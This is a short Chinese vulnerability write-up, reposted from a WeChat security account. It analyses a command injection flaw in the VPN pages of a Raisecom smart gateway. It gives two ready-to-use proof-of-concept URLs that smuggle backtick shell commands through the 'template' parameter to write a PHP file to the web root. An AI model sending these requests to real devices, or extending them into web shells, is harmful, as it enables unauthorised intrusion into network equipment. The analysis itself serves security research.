瑞斯康达智能网关命令执行漏洞简单分析

admin 2024年12月31日23:04:13评论23 views字数 886阅读2分57秒阅读模式

漏洞分析

今年看到这个厂商的设备又爆漏洞了,一起分析下这个命令执行漏洞

我们先根据网上的文章定位漏洞文件 list_base_config.php

瑞斯康达智能网关命令执行漏洞简单分析
image-20241231103058916

这里看到可以传入几个参数 type parts pages serch_value,我们往下看这个switch分支的判断条件,想要调用sslvpn_config_mod这个方法的话我们需要按照条件构造参数到这里参数应该是

parts=base_config&type=mod

我们进入到这个方法中,看到了几个exec函数,不过没找到上述传入的 $config_type = 2;在哪,没关系我们直接看这个朴实无华的命令拼接

瑞斯康达智能网关命令执行漏洞简单分析
image-20241231105423075

这里发现传入两个参数都可触发命令拼接我们选择 template 进行传参并带入exec函数执行,

template=`echo+-e+'<?php phpinfo();>'>/www/tmp/phpinfo.php`

那么到这里我们的完整poc应该就是

http://127.0.0.1/vpn/list_base_config.php?parts=base_config&type=mod&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/phpinfo.php`
瑞斯康达智能网关命令执行漏洞简单分析
image-20241231110849770

梅开二度

这里我们查看这个方法的调用还有以下几个文件

瑞斯康达智能网关命令执行漏洞简单分析
image-20241231111504917

随便看一个其他的 list_ip_network.php

瑞斯康达智能网关命令执行漏洞简单分析
image-20241231111545946

这里需要满足传参 Nradius_submit为ture的情况下即可,所以poc为

/vpn/list_ip_network.php?Nradius_submit=1&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/info.php`
瑞斯康达智能网关命令执行漏洞简单分析
image-20241231111949083

原文始发于微信公众号(XK Team):瑞斯康达智能网关命令执行漏洞简单分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月31日23:04:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   瑞斯康达智能网关命令执行漏洞简单分析https://cn-sec.com/archives/3576235.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息